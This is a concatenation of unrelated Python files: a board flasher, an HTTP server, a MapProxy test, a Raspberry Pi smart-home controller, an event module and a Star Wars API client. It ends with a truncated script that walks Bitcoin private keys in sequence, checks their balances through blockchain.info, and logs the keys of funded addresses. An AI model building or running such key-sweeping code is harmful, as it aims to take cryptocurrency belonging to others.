if working_threads[port]:
working_threads[port].join()
_ports = list(cmd_args.ports)
for port in _ports:
if working_threads[port] == None:
print("Error testing board on port %s" % port)
cmd_args.ports.remove(port)
ret = 1
elif cmd_args.board == 'WiPy':
print("Batch test OK on port %s, firmware version %s" % (port, fw_version.number))
with open('%s_Flasher_Results.csv' % (cmd_args.board), 'ab') as csv_file:
csv_writer = csv.writer(csv_file, delimiter=',')
csv_writer.writerow(['%s' % (cmd_args.board), '%s' % (fw_version.number), ' ', 'OK'])
except Exception as e:
ret = 1
print_exception(e)
if ret == 0:
print("=============================================================")
print("Batch testing succeeded :-)")
print("=============================================================")
else:
print("=============================================================")
print("ERROR: Batch testing failed in some boards!")
print("=============================================================")
global_ret = 1
        # only do the MAC programming and MAC verification for the LoPy, SiPy and LoPy4
if cmd_args.board == 'LoPy' or cmd_args.board == 'SiPy' or cmd_args.board == 'LoPy4':
print("Waiting before programming the LPWAN MAC address...")
time.sleep(3.5) # wait for the board to reset
working_threads = {}
try:
for port in cmd_args.ports:
set_mac_status(mac_per_port[port], "", DB_MAC_LOCK) # mark them as locked, so if the script fails and doesn't get to save, they wont be accidentally reused
working_threads[port] = threading.Thread(target=flash_lpwan_mac, args=(port, mac_per_port[port]))
working_threads[port].start()
for port in cmd_args.ports:
if working_threads[port]:
working_threads[port].join()
_ports = list(cmd_args.ports)
for port in _ports:
if working_threads[port] == None:
print("Error programing MAC address on port %s" % port)
cmd_args.ports.remove(port)
ret = 1
set_mac_status(mac_per_port[port], wmacs[port], DB_MAC_ERROR)
except Exception as e:
ret = 1
print_exception(e)
if ret == 0:
print("=============================================================")
print("Batch MAC programming succeeded :-)")
print("=============================================================")
else:
print("=============================================================")
print("ERROR: Batch MAC programming failed in some boards!")
print("=============================================================")
global_ret = 1
print("Waiting for the board(s) to reboot...")
time.sleep(4.5) # wait for the board to reset
working_threads = {}
try:
for port in cmd_args.ports:
working_threads[port] = threading.Thread(target=run_final_test, args=(port, cmd_args.board, mac_per_port[port]))
working_threads[port].start()
for port in cmd_args.ports:
if working_threads[port]:
working_threads[port].join()
for port in cmd_args.ports:
if working_threads[port] is None:
ret = 1
set_mac_status(mac_per_port[port], wmacs[port], DB_MAC_ERROR)
print("Error performing MAC address test on port %s" % port)
else:
set_mac_status(mac_per_port[port], wmacs[port], DB_MAC_OK)
print("Final test OK on port %s, firmware version %s, MAC address %s" % (port, fw_version.number, mac_per_port[port]))
with open('%s_Flasher_Results.csv' % (cmd_args.board), 'ab') as csv_file:
csv_writer = csv.writer(csv_file, delimiter=',')
csv_writer.writerow(['%s' % (cmd_args.board), '%s' % (fw_version.number), '%s' % (mac_per_port[port]), 'OK'])
except Exception as e:
ret = 1
print_exception(e)
if ret == 0:
print("=============================================================")
print("Final test succeeded on all boards :-)")
print("=============================================================")
else:
print("=============================================================")
print("ERROR: Some boards failed the final test!")
print("=============================================================")
global_ret = 1
macs_db.close()
sys.exit(global_ret)
if __name__ == "__main__":
main()
|
pvhttpsrv.py
|
#!/usr/bin/env python3
# Infos: https://medium.com/@andrewklatzke/creating-a-python3-webserver-from-the-ground-up-4ff8933ecb96
#
# Additional info:
# https://www.afternerd.com/blog/python-http-server/
# https://daanlenaerts.com/blog/2015/06/03/create-a-simple-http-server-with-python-3/
# https://stackabuse.com/serving-files-with-pythons-simplehttpserver-module/
from pv.data import PVData
from pvbasemodul import PVBaseModul
import threading
from http.server import HTTPServer
from pvhttpsrv.server import Server
class PVHttpSrv(PVBaseModul):
pvdata = PVData()
handler = None
httpd = None
enabled = False
serveraddress = ""
port = 8080
directory = ""
def __init__(self, serveraddress="", port=8080, directory="", onDataRequest=None, onWebCamRequest=None):
super().__init__()
def InitArguments(self, parser):
super().InitArguments(parser)
parser.add_argument('-hse', '--httpsrvenabled', help='http server enabled', required=False)
parser.add_argument('-hsa', '--httpsrvaddress', help='http server address', required=False)
parser.add_argument('-hsp', '--httpsrvport', help='http server port', required=False)
parser.add_argument('-hsd', '--httpsrvdirectory', help='http server directory', required=False)
def SetConfig(self, config, args):
super().SetConfig(config, args)
configsection = "httpserver"
self.enabled = self.CheckArgsOrConfig(config, self.enabled, args.httpsrvenabled, configsection, "enabled", "bool")
self.serveraddress = self.CheckArgsOrConfig(config, self.serveraddress, args.httpsrvaddress, configsection, "srvaddress")
self.port = self.CheckArgsOrConfig(config, self.port, args.httpsrvport, configsection, "port", "int")
self.directory = self.CheckArgsOrConfig(config, self.directory, args.httpsrvdirectory, configsection, "directory")
def Connect(self, onDataRequest=None, onWebCamRequest=None):
print("PVHttpSrv.Connect() called")
super().Connect()
self.onDataRequest = onDataRequest
self.onWebCamRequest = onWebCamRequest
self.handler = Server # pvHttpRequestHandler
self.handler.onDataRequest = onDataRequest
self.handler.onWebCamRequest = onWebCamRequest
self.handler.directory = self.directory
# Server settings
# Default to port 8080; using port 80 (the standard HTTP port) requires root access
server_address = (self.serveraddress, self.port)
self.httpd = HTTPServer(server_address, self.handler)
self.server_thread = threading.Thread(target=self.httpd.serve_forever)
self.server_thread.daemon = True
def run(self):
print('starting http server...')
self.server_thread.start()
print('running http server...')
def stop(self):
self.httpd.shutdown()
self.httpd.server_close()
print("http server stopped")
|
test_seed_cachelock.py
|
# This file is part of the MapProxy project.
# Copyright (C) 2012 Omniscale <http://omniscale.de>
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import multiprocessing
import time
import sys
import pytest
from mapproxy.seed.cachelock import CacheLocker, CacheLockedError
@pytest.mark.skipif(sys.platform == "win32", reason="test not supported for Windows")
@pytest.mark.skipif(sys.platform == "darwin" and sys.version_info >= (3, 8), reason="test not supported for MacOS with Python >=3.8")
class TestCacheLock(object):
@pytest.fixture
def lock_file(self, tmpdir):
return (tmpdir / "lock").strpath
def test_free_lock(self, lock_file):
locker = CacheLocker(lock_file)
with locker.lock("foo"):
assert True
def test_locked_by_process_no_block(self, lock_file):
proc_is_locked = multiprocessing.Event()
def lock():
locker = CacheLocker(lock_file)
with locker.lock("foo"):
proc_is_locked.set()
time.sleep(10)
p = multiprocessing.Process(target=lock)
p.start()
# wait for process to start
proc_is_locked.wait()
locker = CacheLocker(lock_file)
# test unlocked bar
with locker.lock("bar", no_block=True):
assert True
# test locked foo
try:
with locker.lock("foo", no_block=True):
assert False
except CacheLockedError:
pass
finally:
p.terminate()
p.join()
def test_locked_by_process_waiting(self, lock_file):
proc_is_locked = multiprocessing.Event()
def lock():
locker = CacheLocker(lock_file)
with locker.lock("foo"):
proc_is_locked.set()
time.sleep(.1)
p = multiprocessing.Process(target=lock)
start_time = time.time()
p.start()
# wait for process to start
proc_is_locked.wait()
locker = CacheLocker(lock_file, polltime=0.02)
try:
with locker.lock("foo", no_block=False):
diff = time.time() - start_time
assert diff > 0.1
finally:
p.terminate()
p.join()
|
control.py
|
# -*- coding: utf-8 -*-
# !/usr/bin/python
import sqlite3
import time
import serial
import binascii
import RPi.GPIO as GPIO
from sakshat import SAKSHAT
import threading
import os
GPIO.setmode(GPIO.BCM)
DS = 6
SHCP = 19
STCP = 13
PIN_NO_BEEP = 12
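# Descriptive note (added for clarity; pin roles are inferred from writeBit()/writeByte() below):
# DS/SHCP/STCP appear to be the data, shift-clock and latch-clock pins of a
# 74HC595-style shift register driving the 8-LED row; PIN_NO_BEEP drives the buzzer.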
# A/C power on
ac_open = ['FD','FD','30','03','40','17','00','34','1F','01','2F','02','6A','00','25','00','21','00','27','00','16','05','27','00','2F','0A','27','00','00','00','23','00','FF','FF','FF','FF','FF','FF','FF','FF','01','22','12','22','22','12','12','22','22','22','22','12','22','22','21','21','22','12','32','22','21','22','22','22','22','12','22','22','22','22','22','22','22','22','24','01','22','12','22','22','12','12','22','22','22','22','12','22','22','21','11','22','12','32','22','22','22','22','22','22','22','22','22','22','22','22','22','21','21','15','00','00','F0','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','01','76','3F','A1','DF','DF']
# A/C power off
ac_close = ['FD','FD','30','03','40','17','00','34','23','01','29','02','68','00','28','00','21','00','27','00','15','05','27','00','2D','0A','28','00','00','00','24','00','FF','FF','FF','FF','FF','FF','FF','FF','01','22','22','22','22','12','12','22','22','22','22','12','22','22','21','21','22','12','32','22','21','22','22','22','22','12','22','22','22','22','22','22','22','22','14','01','22','22','22','22','12','12','22','22','22','22','12','22','22','21','11','22','12','32','22','22','22','22','22','22','22','22','22','22','22','22','22','21','21','25','00','00','F0','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','76','00','7F','DF','DF']
# Temperature down:
ac_down = ['FD','FD','30','03','40','17','00','34','24','01','2B','02','23','00','25','00','6A','00','25','00','17','05','26','00','32','0A','27','00','00','00','23','00','FF','FF','FF','FF','FF','FF','FF','FF','01','12','21','11','11','21','11','11','11','11','11','21','11','11','12','12','11','21','31','11','12','11','11','11','11','21','11','11','11','11','11','11','12','21','24','01','12','21','11','11','21','11','11','11','11','11','21','11','11','12','22','11','21','31','11','11','11','11','11','11','11','11','11','11','11','11','11','11','11','25','00','00','F0','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','08','76','01','BB','DF','DF']
# Temperature up:
ac_up = ['FD','FD','30','03','40','17','00','34','23','01','2B','02','23','00','26','00','6A','00','25','00','17','05','25','00','33','0A','27','00','00','00','23','00','FF','FF','FF','FF','FF','FF','FF','FF','01','12','21','11','11','12','11','11','11','11','11','21','11','11','12','12','11','21','31','11','12','11','11','11','11','21','11','11','11','11','11','11','12','12','24','01','12','21','11','11','12','11','11','11','11','11','21','11','11','12','22','11','21','31','11','11','11','11','11','11','11','11','11','11','11','11','11','11','21','25','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','EA','DF','DF']
# Cooling mode:
ac_cold = ['FD','FD','30','03','40','17','00','34','20','01','2D','02','69','00','25','00','22','00','27','00','17','05','27','00','32','0A','26','00','26','01','2C','02','00','00','23','00','FF','FF','FF','FF','01','22','12','22','22','12','12','22','22','22','22','12','22','22','21','21','22','12','32','22','21','22','22','22','22','12','22','22','22','22','22','22','22','22','24','51','22','12','22','22','12','12','22','22','22','22','12','22','22','21','11','22','12','32','22','22','22','22','22','22','22','22','22','22','22','22','22','21','21','16','00','00','F0','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','04','76','3E','8E','DF','DF']
# Heating mode:
ac_warm = ['FD','FD','30','03','FF','00','00','3F','46','01','D1','08','43','00','09','00','88','00','0B','00','37','05','0B','00','5C','0C','0C','00','3D','01','10','00','18','01','0C','00','3C','00','11','00','01','12','21','11','11','12','11','11','11','11','11','21','11','11','12','12','11','21','31','11','12','11','11','11','11','21','11','11','11','11','11','11','12','12','24','51','12','21','11','11','12','11','11','11','11','11','21','11','11','12','67','70','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','07','00','04','76','01','B8','DF','DF']
# Projector:
projector = ['FD','FD','30','03','62','87','00','34','21','01','24','02','68','00','23','00','20','00','23','00','69','0A','24','00','22','01','25','02','33','00','11','00','7B','00','11','00','00','00','0F','00','01','12','22','22','11','21','21','21','22','22','21','22','11','11','12','11','23','41','12','22','22','11','21','21','21','22','22','21','52','16','66','65','66','57','F0','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','30','DF','DF']
def init():
GPIO.setup(DS, GPIO.OUT)
GPIO.setup(SHCP, GPIO.OUT)
GPIO.setup(STCP, GPIO.OUT)
GPIO.output(DS, GPIO.LOW)
GPIO.output(SHCP, GPIO.LOW)
GPIO.output(STCP, GPIO.LOW)
def writeBit(data):
GPIO.output(DS, data)
GPIO.output(SHCP, GPIO.LOW)
GPIO.output(SHCP, GPIO.HIGH)
# Write the state of the 8 LEDs
def writeByte(data):
for i in range(0, 8):
writeBit((data >> i) & 0x01)
# Latch signal to refresh the outputs
GPIO.output(STCP, GPIO.LOW)
GPIO.output(STCP, GPIO.HIGH)
# Single beep
def beep(seconds):
GPIO.output(PIN_NO_BEEP, GPIO.LOW)
time.sleep(seconds)
GPIO.output(PIN_NO_BEEP, GPIO.HIGH)
def send(send_data):
if (ser.isOpen()):
#ser.write(send_data.encode('utf-8')) # send UTF-8 encoded
ser.write(binascii.a2b_hex(send_data)) # send as hex
#print("send OK", send_data)
else:
print("send failed")
# run once every 5 seconds
def sleeptime(hour,min,sec):
return hour*3600 + min*60 + sec
# the lightloop threading
def lightLoop():
while True:
global STOP_FLAG
if STOP_FLAG:
continue
for i in [0x01, 0x02, 0x04, 0x08, 0x10, 0x20, 0x40, 0x80, 0x00]:
writeByte(i)
time.sleep(0.1)
def smartmode():
while True:
global AUTOFLAG
if not AUTOFLAG:
continue
t = SAKS.ds18b20.temperature
print(t)
# input the nodedata
result = os.popen('/home/pi/smarthome/neural_network/SmartHome {} 50'.format(int(t)))
res = result.read()
# close ac
if '0' in res:
print('neural network decision close ac')
for i in range(len(ac_close)):
send(ac_close[i])
# A/C off
SAKS.ledrow.off_for_index(0)
# coldmode
if '1' in res:
print('neural network decision cold mode')
for i in range(len(ac_cold)):
send(ac_cold[i])
# warmmode
if '2' in res:
print('neural network decision warm mode')
for i in range(len(ac_warm)):
send(ac_warm[i])
# Repeat every 10 seconds (see time.sleep below)
time.sleep(10)
def main():
str1 = '0'
str2 = '0'
t1 = threading.Thread(target=lightLoop)
t2 = threading.Thread(target=smartmode)
t1.start()
t2.start()
while True:
time.sleep(sleeptime(0,0,2))
# initial string variables declared as '0'
# Connect to (or create) the database
conn = sqlite3.connect('/home/pi/smarthome/web_ui/db.sqlite3')
c = conn.cursor()
print ("Opened database successfully")
# Create table
#c.execute('create table myhome_commands (id Integer primary key autoincrement , intent Text , slots Text)')
#print ("create myhome_commands table success")
#conn.commit()
# # Insert dummy data
# c.execute("INSERT INTO myhome_commands (intent,slots) \
# VALUES ('INTENT_ERROR', '' )")
# conn.commit()
# print ("Records created successfully")
# Read data from the sqlite database
cursor = c.execute("SELECT intent, slots from myhome_commands")
for row in cursor:
payload = '{"intent":"%s","slots":"%s","slaveID":3,"control":1,"command_first_byte":1,"command_second_byte":2,"command_third_byte":3,"command_fourth_byte":4}' \
%(row[0], row[1])
# Check whether the fetched string has changed (i.e. new output from the voice control)
if str1 in row[0]:
if str2 in row[1]:
print('not new command')
break
else:
print('new command')
str1 = row[0]
str2 = row[1]
else:
print('new command')
str1 = row[0]
str2 = row[1]
print (payload)
if row[0]== 'AC_OPEN' and row[1] == '':
print("open ac")
for i in range(len(ac_open)):
send(ac_open[i])
# A/C on indicator LED
SAKS.ledrow.on_for_index(0)
elif row[0]== 'AC_CLOSE' and row[1] == '':
print('close ac')
for i in range(len(ac_close)):
send(ac_close[i])
# A/C off indicator LED
SAKS.ledrow.off_for_index(0)
elif row[0]== 'AC_COLD' and row[1] == '':
print('cold mode')
for i in range(len(ac_cold)):
send(ac_cold[i])
elif row[0]== 'AC_WARM' and row[1] == '':
print('warm mode')
for i in range(len(ac_warm)):
send(ac_warm[i])
elif row[0]== 'AC_DOWN' and row[1] == '':
print('lower temp')
for i in range(len(ac_down)):
send(ac_down[i])
elif row[0]== 'AC_UP' and row[1] == '':
print('higher temp')
for i in range(len(ac_up)):
send(ac_up[i])
elif row[0]== 'OPEN_PPT' and row[1] == '':
print('open projector')
for i in range(len(projector)):
send(projector[i])
# Projector on indicator LED
SAKS.ledrow.on_for_index(1)
elif row[0]== 'CLOSE_PPT' and row[1] == '':
print('close projector')
for i in range(len(projector)):
send(projector[i])
# Projector off
SAKS.ledrow.off_for_index(1)
elif row[0]== 'OPEN_BOX' and row[1] == '':
print('open audio')
# Audio on
global STOP_FLAG
STOP_FLAG = False
elif row[0]== 'CLOSE_BOX' and row[1] == '':
# global STOP_FLAG
STOP_FLAG = True
print('close audio')
elif row[0] == 'AUTOMODE' and row[1] == '':
print('smart mode')
global AUTOFLAG
AUTOFLAG = True
SAKS.ledrow.on_for_index(2)
elif row[0] == 'NORMALMODE' and row[1] == '':
print('normal mode')
# global AUTOFLAG
AUTOFLAG = False
SAKS.ledrow.off_for_index(2)
elif row[0]== 'INTENT_ERROR' and row[1] == '':
print('INTENT ERROR')
# Buzzer warning
beep(0.05)
# Temperature display
temp = SAKS.ds18b20.temperature
SAKS.digital_display.show(("%.2f" % temp).replace(' ','#'))
# # Create table
# c.execute('create table myhome_nodedata (id Integer primary key autoincrement , time Text , localshortaddr Text , gateway_id Text , slaveId Text , humidity Integer , temperature Integer , light Integer , noise Integer , co2_simulation Integer , co2_binarization Integer)')
# print ("create myhome_nodedata table success")
# conn.commit()
# Insert data
sql = "insert into myhome_nodedata(time,localshortaddr, gateway_id,slaveId, humidity, temperature,light, noise, co2_simulation, co2_binarization)values('%s','%s','%s','%s',%f,%f,%f,%f,%f,%f)" % (0,0,0,0,63.2, temp,862.13,77.61,0.14,0.14)
conn.execute(sql)
conn.commit()
print ("Records created successfully insert into myhome_nodedata values")
#beep(0.05)
print ("Operation done successfully")
conn.close()
if __name__ == '__main__':
STOP_FLAG = True
AUTOFLAG = False
try:
SAKS = SAKSHAT()
GPIO.setmode(GPIO.BCM)
GPIO.setup(PIN_NO_BEEP, GPIO.OUT, initial=GPIO.HIGH)
ser = serial.Serial('/dev/ttyAMA0',9600)
if(ser.isOpen()):
print("open serial successful")
else:
print("open serial failed")
init()
while True:
main()
except KeyboardInterrupt:
print("except")
# Turn off all LEDs
writeByte(0x00)
GPIO.cleanup()
|
event.py
|
# -*- coding: utf-8 -*-
# MIT License
#
# Copyright 2020 Kevin G. Schlosser
#
# Permission is hereby granted, free of charge, to any person obtaining a copy of this
# software and associated documentation files (the "Software"), to deal in the Software
# without restriction, including without limitation the rights to use, copy, modify,
# merge, publish, distribute, sublicense, and/or sell copies of the Software, and to
# permit persons to whom the Software is furnished to do so, subject to the following
# conditions:
#
# The above copyright notice and this permission notice shall be included in all copies
# or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED,
# INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR
# PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE
# FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR
# OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER
# DEALINGS IN THE SOFTWARE.
"""
This file is part of the **micasaverde_vera**
project https://github.com/kdschlosser/MiCasaVerde_Vera.
:platform: Unix, Windows, OSX
:license: MIT
:synopsis: events
.. moduleauthor:: Kevin Schlosser @kdschlosser <kevin.g.schlosser@gmail.com>
"""
from fnmatch import fnmatchcase
import threading
import logging
from . import utils
logger = logging.getLogger(__name__)
class _NotificationHandler(object):
def __init__(self):
self._callbacks = {}
self.event_callback_threads = True
@utils.logit
def bind(self, event, callback):
event = event.lower()
if event not in self._callbacks:
self._callbacks[event] = []
event_handler = EventHandler(event, callback)
self._callbacks[event] += [event_handler]
return event_handler
@utils.logit
def unbind(self, event_handler):
event = event_handler.event_name
if event in self._callbacks:
if event_handler in self._callbacks[event]:
self._callbacks[event].remove(event_handler)
if not self._callbacks[event]:
del self._callbacks[event]
@utils.logit
def notify(self, event_object, event):
for event_name, event_handlers in self._callbacks.items():
if fnmatchcase(event.lower(), event_name):
for event_handler in event_handlers:
event_handler.event = event
event_handler.event_object = event_object
NotificationHandler = _NotificationHandler()
Notify = NotificationHandler.notify
class EventHandler(object):
def __init__(self, event_name, callback, event_handler=None):
self.__event = None
self.event_name = event_name
self.__callback = callback
self.__event_object = None
if event_handler is None:
event_handler = self
self.__event_handler = event_handler
@property
def event(self):
return self.event_name if self.__event is None else self.__event
@event.setter
def event(self, event):
self.__event = event
def _run_in_thread(self, event_object):
self.__event_object = event_object
t = threading.Thread(target=self.__callback, args=(self,))
t.daemon = True
t.start()
def event_object(self, event_object):
if NotificationHandler.event_callback_threads:
event = self.copy()
event.event = self.__event
event._run_in_thread(event_object)
else:
self.__event_object = event_object
self.__callback(self)
event_object = property(fset=event_object)
def __getattr__(self, item):
if item in self.__dict__:
return self.__dict__[item]
return getattr(self.__event_object, item)
@utils.logit
def unbind(self):
NotificationHandler.unbind(self.__event_handler)
@utils.logit
def copy(self):
return EventHandler(
self.event_name,
self.__callback,
self.__event_handler
)
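# Hedged usage sketch (added for illustration; the event name and callback are
# made up). A callback bound via NotificationHandler.bind() receives an
# EventHandler copy when Notify() fires a matching event; attribute access on
# that object is forwarded to the notifying event_object:
#
#   def on_device_change(event):
#       print(event.event)                     # the concrete event name that matched
#
#   handler = NotificationHandler.bind('device.*.changed', on_device_change)
#   Notify(some_device, 'device.7.changed')    # callback runs in a daemon thread
#   handler.unbind()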
|
swapi.py
|
import requests
import requests_cache
import threading
from api import Api
class Swapi(Api):
_page_size=10
_base_url = 'https://swapi.dev/api/'
def __init__(self, cache=True):
if cache:
requests_cache.install_cache('.swapi_cache', backend='sqlite', expire_after=3600)
def do_request(self, url):
response = requests.get(url)
if response.status_code != 200:
raise Exception('Unsuccessful API response: %d' % response.status_code)
try:
return response.json()
except ValueError as err:
raise Exception('Invalid JSON response from API') from err
def _get_last_page(self, count):
return int(count / self._page_size) + (1 if count % self._page_size > 0 else 0)
def _call_extend_result(self, url, results=[]):
rjson = self.do_request(url)
if 'results' in rjson:
results.extend(rjson['results'])
else:
results.extend(rjson)
return results
def call(self, url):
rjson = self.do_request(url)
results = rjson
if 'results' in rjson:
results = rjson['results']
if 'next' in rjson and rjson['next'] is not None:
threads = []
for page in range(2, self._get_last_page(rjson['count']) + 1):
th = threading.Thread(target=self._call_extend_result, args=(url + ('?page=%d' % page), results))
threads.append(th)
th.start()
for th in threads:
th.join()
return results
def get_root(self):
return self.call(self._base_url)
def get_resource(self, resource, id=0):
url = '%s%s/' % (self._base_url, resource)
if id > 0:
url = '%s%d/' % (url, id)
return self.call(url)
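# Hedged usage sketch (added for illustration; assumes the local api module
# providing the Api base class is importable and swapi.dev is reachable).
if __name__ == '__main__':
    swapi = Swapi(cache=True)
    # Single resource by id returns the plain JSON object:
    luke = swapi.get_resource('people', 1)
    print(luke['name'] if isinstance(luke, dict) else luke)
    # A whole collection is fetched page by page, one thread per extra page:
    planets = swapi.get_resource('planets')
    print('planets fetched: %d' % len(planets))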
|
start_to_end.py
|
import threading
import os
import time
import random
import requests
import json
from bit import Key
from bit.format import bytes_to_wif
import traceback
# maxPage = int(pow(2, 256) / 128)
maxPage = 904625697166532776746648320380374280100293470930272690489102837043110636675
def getRandPage():
return random.randint(1, maxPage)
def getPage(pageNum):
keyList = []
addrList = []
addrStr1 = ""
addrStr2 = ""
num = (pageNum - 1) * 128 + 1
try:
for i in range(num, num + 128):
key1 = Key.from_int(i)
wif = bytes_to_wif(key1.to_bytes(), compressed=False)
key2 = Key(wif)
keyList.append(wif)
addrList.append(key2.address)
addrList.append(key1.address)
if len(addrStr1): addrStr1 = addrStr1 + "|"
addrStr1 = addrStr1 + key2.address
if len(addrStr2): addrStr2 = addrStr2 + "|"
addrStr2 = addrStr2 + key1.address
except:
pass
return [keyList, addrList, addrStr1, addrStr2]
'''
def getPage(pageNum):
try:
r = requests.get(url='https://keys.lol/bitcoin/%d' % pageNum, headers={'User-agent': 'Mozilla/5.0'}, timeout=5)
# r = requests.get(url='https://keys.lol/bitcoin/1',headers={'User-agent': 'Mozilla/5.0'}, timeout=5)
# r = requests.get(url='https://www.opennet.ru/', timeout=5)
print('https://keys.lol/bitcoin/%d' % pageNum)
print('requests=', r)
r = r.content
print("r=", r)
except:
return []
keys = r.split("how-this-works!/")
addrs = r.split("blockchain.com/btc/address/")
keyList = []
addrList = []
addrStr1 = ""
addrStr2 = ""
for i in range(1, len(keys)):
key = keys[i].split("\"")[0]
keyList.append(key)
for i in range(1, len(addrs)):
addr = addrs[i].split("\"")[0]
addrList.append(addr)
if i % 2 == 1:
if len(addrStr1): addrStr1 = addrStr1 + "|"
addrStr1 = addrStr1 + addr
else:
if len(addrStr2): addrStr2 = addrStr2 + "|"
addrStr2 = addrStr2 + addr
return [keyList, addrList, addrStr1, addrStr2]
'''
def getBalances(addrStr):
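    # Descriptive note (added for clarity; the exact message format is inferred
    # from the string handling below): blockchain.info sometimes answers with a
    # plain-text "security" message of the form "... effects address <addr>."
    # instead of JSON. The loop strips the offending address from the query
    # string and retries until the response no longer contains that marker.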
balances = "security"
while True:
if "security" not in balances: break
secAddr = balances.split("effects address ")
if len(secAddr) >= 2:
secAddr = secAddr[1].split(".")[0]
addrStr = addrStr.replace(secAddr + "|", "")
addrStr = addrStr.replace("|" + secAddr, "")
try:
r = requests.get(url='http://blockchain.info/multiaddr?active=%s' % addrStr, timeout=5)
# print ("requests=", r.text)
balances = r.text
except:
return
try:
balances = json.loads(balances)
balances = balances['addresses']
except:
print(balances)
return balances
getCount = 0
page = 1
fp_found = open("found.txt", "a+")
fp_fund = open("fund.txt", "a+")
try:
start_page_file = open("start_page.txt", "r+")
page = int(list(start_page_file)[-1])
except:
start_page_file = open("start_page.txt", "x+")
def getWallet():
global getCount
global page
while page <= maxPage:
# page = getRandPage()
print("page=", page)
pageRet = getPage(page)
try:
balancesRet = getBalances(pageRet[2])
for balance in balancesRet:
getCount = getCount + 1
if balance['final_balance'] <= 0 and balance['total_sent'] <= 0: continue
key = ""
isCompress = 0
for i in range(0, len(pageRet[1])):
if balance['address'] == pageRet[1][i]:
key = pageRet[0][int(i / 2)]
if i % 2 == 1: isCompress = 1
break
if key == "": continue
fp_found.write(str(isCompress) + " " + str(balance['final_balance']) + " " + str(
balance['total_sent']) + " " + key + " " + balance['address'] + "\n")
if balance['final_balance'] > 0:
fp_fund.write(str(isCompress) + " " + str(balance['final_balance']) + " " + str(
balance['total_sent']) + " " + key + " " + balance['address'] + "\n")
print(isCompress, balance['final_balance'], balance['total_sent'], key, balance['address'])
balancesRet = getBalances(pageRet[3])
for balance in balancesRet:
getCount = getCount + 1
if balance['final_balance'] <= 0 and balance['total_sent'] <= 0: continue
key = ""
isCompress = 1
for i in range(0, len(pageRet[1])):
if balance['address'] == pageRet[1][i]:
key = pageRet[0][int(i / 2)]
if i % 2 == 1: isCompress = 1
break
if key == "": continue
fp_found.write(str(isCompress) + " " + str(balance['final_balance']) + " " + str(
